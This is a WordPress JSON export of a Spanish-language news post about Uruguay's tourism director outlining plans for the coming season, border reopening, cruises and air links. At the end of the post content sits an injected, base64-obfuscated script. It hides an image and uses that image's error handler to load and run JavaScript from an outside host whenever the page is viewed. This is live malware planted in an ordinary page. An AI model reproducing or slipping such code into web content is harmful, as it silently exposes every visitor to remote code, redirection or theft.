{"id":4627,"date":"2021-08-31T11:29:52","date_gmt":"2021-08-31T14:29:52","guid":{"rendered":"https:\/\/argentinatermal.com.ar\/?p=4627"},"modified":"2025-08-13T16:28:53","modified_gmt":"2025-08-13T19:28:53","slug":"uruguay-planifica-la-proxima-temporada-turistica","status":"publish","type":"post","link":"https:\/\/argentinatermal.com.ar\/?p=4627","title":{"rendered":"Uruguay planifica la pr\u00f3xima temporada tur\u00edstica"},"content":{"rendered":"\n<h3 class=\"wp-block-heading\">El Director Nacional de Turismo present\u00f3 la agenda de eventos y la campa\u00f1a publicitaria del organismo<\/h3>\n\n\n\n<p>El Director Nacional de Turismo, Roque Baudean, se reuni\u00f3 con varios directores de turismo y la C\u00e1mara Uruguaya de Turismo para marcar lo que ser\u00e1 el trabajo entre el Ministerio de Turismo y el sector privado, con el objetivo de involucrar a todos los actores y tomar decisiones, algunas que corresponden a la funci\u00f3n p\u00fablica y otras que son de inter\u00e9s del sector privado<br><br>El encuentro tuvo lugar en Maldonado, donde Baudean expres\u00f3 que present\u00f3 la agenda de eventos, en la cual va a participar el Ministerio de Turismo y tambi\u00e9n lo que va a ser la campa\u00f1a publicitaria del organismo.<\/p>\n\n\n\n<p>Baudean tambi\u00e9n se refiri\u00f3 a herramientas que se brindan desde el Ministerio de Turismo para una mejor comercializaci\u00f3n de la oferta tur\u00edstica uruguaya y expres\u00f3 que recogi\u00f3 algunas recomendaciones para diferentes acciones que cree que son \u201cpor dem\u00e1s interesantes\u201d.<\/p>\n\n\n\n<p>A su vez, en reuniones agendadas a nivel de direcciones de turismo departamentales, como por ejemplo el pr\u00f3ximo 30 de setiembre, llevar acciones a diferentes personas o productos tur\u00edsticos, los cuales luego ser\u00e1n desarrollados en la regi\u00f3n de acuerdo a la conducta del turista a nivel internacional.<\/p>\n\n\n\n<p>Para esta pr\u00f3xima temporada de verano, Baudean augura que el turismo interno seguir\u00e1 siendo preponderante y que tendremos un movimiento tur\u00edstico regional.<\/p>\n\n\n\n<p>Entendemos que que vamos a tener un movimiento regional y el turismo interno va a seguir teniendo un papel preponderante, al menos en esta pr\u00f3xima temporada estival.<\/p>\n\n\n\n<p>En relaci\u00f3n al nuevo ministro de Turismo, Tabar\u00e9 Viera, Baudean dijo que \u201ces una persona que sabe trabajar muy bien en equipo, lo cual ha demostrado en sus diferentes gestiones y que tiene una trayectoria muy grande\u201d.<\/p>\n\n\n\n<p>La idea de Viera es el trabajo en equipo entre las diferentes jerarqu\u00edas del Ministerio de Turismo y todo su personal y de poner a trabajar en territorio a todo el equipo de t\u00e9cnicos, sobre todo de planeamiento y llegar a todos los territorios. \u201cVamos en esa l\u00ednea, estamos contentos\u201d sostuvo Baudean.<\/p>\n\n\n\n<p>Con respecto a la planificaci\u00f3n de trabajo con el sector privado, Baudean expres\u00f3 que el mismo tiene que tomar decisiones en relaci\u00f3n a dicha planificaci\u00f3n. \u201cEl sector privado tiene que ir por el mismo hilo conductor y no por separado del sector p\u00fablico\u201d, expres\u00f3 Baudean.<\/p>\n\n\n\n<p>Sobre el movimiento de transporte internacional, Baudean dijo que los n\u00fameros del mismo no volver\u00e1n a ser los mismo de enero de 2020, hasta dentro de algunos a\u00f1os, \u201cpor m\u00e1s que quisi\u00e9ramos y por m\u00e1s que tengamos voluntad de recibir mucha gente extra-regional\u201d, sostuvo.<\/p>\n\n\n\n<p>Baudean destac\u00f3 que para el Poder Ejecutivo lo que prima es la salud de los uruguayos, y el deseo del Director Nacional en lo regional es que la vacunaci\u00f3n en los pa\u00edses lim\u00edtrofes sea m\u00e1s \u00e1gil.<\/p>\n\n\n\n<p>Record\u00f3 que la hoja de ruta es abrir las fronteras a partir del 1\u00ba de setiembre a los a los propietarios que est\u00e9n vacunados y luego a partir del 1\u00ba de noviembre a los turistas en general vacunados.<\/p>\n\n\n\n<p>En ese sentido Baudean expres\u00f3 cautela en la planificaci\u00f3n de acuerdo a las coyunturas econ\u00f3micas y sanitarias de la regi\u00f3n. Prefiere planificar con situaciones razonables y que pueden llegar a suceder y no con especulaciones.<\/p>\n\n\n\n<p>Sobre la pr\u00f3xima Temporada de Cruceros, Baudean manifest\u00f3 que es un tema que maneja el subsecretario Remo Monzeglio a trav\u00e9s de reuniones con diferentes empresas de cruceros internacionales. \u201cEl cronograma de solicitudes de llegadas ha sido muy importante, de mucha cantidad tanto para Montevideo como para Punta del Este\u201d, dijo.<\/p>\n\n\n\n<p>En este sentido, Baudean record\u00f3 que la decisi\u00f3n que haya temporada de Cruceros, no depende solo de Uruguay, lo define un circuito integrado adem\u00e1s por Argentina y Brasil, entre el sector p\u00fablico y privado. Por Uruguay trabajan la Administraci\u00f3n Nacional de Puertos (ANP) y el Ministerio de Turismo.<\/p>\n\n\n\n<p>Con referencia a la participaci\u00f3n de Uruguay en la Feria Internacional de Turismo (FIT), Baudean confirm\u00f3 la presencia de nuestro pa\u00eds en dicho evento, con el objetivo de poder causar el mejor impacto de Uruguay, ya que la participaci\u00f3n no ser\u00e1 de forma convencional, sino que tendr\u00e1 una serie de protocolos. \u201cHay que llamar la atenci\u00f3n no solo del p\u00fablico profesional, sino tambi\u00e9n del p\u00fablico en general que visitar\u00e1 la feria\u201d, expres\u00f3 Baudean.<\/p>\n\n\n\n<p>Por \u00faltimo sobre el apoyo a los operadores, Baudean subray\u00f3 que hubo un paquete de medidas que ayud\u00f3 a transcurrir de una mejor manera la pandemia. Tambi\u00e9n Baudean no olvid\u00f3 a aquellos operadores que cerraron y quedaron por el camino. Y se refiri\u00f3 especialmente a los agentes de viaje, a quienes se refiri\u00f3 \u201ccomo el sector que m\u00e1s sufri\u00f3\u201d.<\/p>\n\n\n\n<p>Baudean resalt\u00f3 la importancia de los agentes de viaje en relaci\u00f3n a la conectividad de nuestro pa\u00eds, \u201cporque las rutas a\u00e9reas son caminos de ida y vuelta\u201d, dijo el jerarca. En ese sentido expres\u00f3 que el pa\u00eds necesita rutas a\u00e9reas fuertes, con turistas que vaya de un lado al otro.<\/p>\n\n\n\n<p>Sin conectividad a\u00e9rea es muy dif\u00edcil captar al p\u00fablico extra regional de forma interesante. Cu\u00e1ntas m\u00e1s compa\u00f1\u00edas a\u00e9reas pueda tener acceso Uruguay, va a ser mejor para nuestro turismo. No hay desarrollo tur\u00edstico sin desarrollo de transporte, concluy\u00f3 Baudean.<\/p>\n\n\n\n<figure class=\"wp-block-image size-large is-resized\"><a href=\"https:\/\/es.travel2latam.com\/nota\/69766-uruguay-uruguay-planifica-la-proxima-temporada-turistica.html\" target=\"_blank\" rel=\"noopener\"><img decoding=\"async\" src=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2021\/06\/travel2latam.logo_.gif\" alt=\"\" class=\"wp-image-4477\" width=\"118\" height=\"45\" \/><\/a><\/figure>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>El Director Nacional de Turismo present\u00f3 la agenda de eventos y la campa\u00f1a publicitaria del organismo El Director Nacional de Turismo, Roque Baudean, se reuni\u00f3 con varios directores de turismo y la C\u00e1mara Uruguaya de Turismo para marcar lo que ser\u00e1 el trabajo entre el Ministerio de Turismo y el sector privado, con el objetivo [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":4628,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[29],"tags":[],"class_list":["post-4627","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-datos-utiles"],"_links":{"self":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/4627","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=4627"}],"version-history":[{"count":2,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/4627\/revisions"}],"predecessor-version":[{"id":10791,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/4627\/revisions\/10791"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/media\/4628"}],"wp:attachment":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=4627"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=4627"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=4627"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}